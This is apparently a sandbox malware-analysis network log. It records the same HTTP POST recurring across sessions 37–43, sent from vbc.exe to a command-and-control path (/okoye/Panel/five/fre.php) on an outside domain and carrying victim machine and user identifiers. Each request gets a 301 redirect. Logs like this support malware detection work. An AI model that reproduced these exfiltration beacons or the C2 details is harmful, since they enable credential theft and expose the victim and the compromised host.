                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:21.159744024 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  37192.168.2.54988992.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:21.443547964 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:21.563410997 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:23.045350075 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:22 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: a9435e233ea9242e6693480cab386492-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.344
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:23.045397997 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  38192.168.2.54989592.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:23.310646057 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:23.430649996 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:25.016725063 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:24 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: e6f1bcde6dc3f4ecdee2a4b01ba95c7a-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.360
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:25.016891003 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  39192.168.2.54990192.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:25.287127972 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:25.406831980 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:27.011996984 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:26 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 4546957b1925545421bda531c88e5f71-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.379
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:27.012039900 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  40192.168.2.54990792.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:27.274868965 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:27.394769907 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:28.961195946 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:28 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: ef84c6e6e89b956ba2333c048049e163-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.339
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:28.961262941 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  41192.168.2.54991392.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:29.240976095 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:29.361058950 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:30.980350018 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:30 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 59b3014220462613c953433910c92f62-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.382
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:30.980391026 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  42192.168.2.54991992.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:31.246462107 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:31.366487026 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:32.953111887 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:32 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: f13c25ae65bb3d89b1e4ed47823ad0c2-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.359
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:13:32.953152895 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  43192.168.2.54992592.113.16.67803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:13:33.220397949 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:13:33.340411901 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:13:34.839884996 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:13:34 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 0fd230a911bb20cdb7e7c054571a39bf-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.358
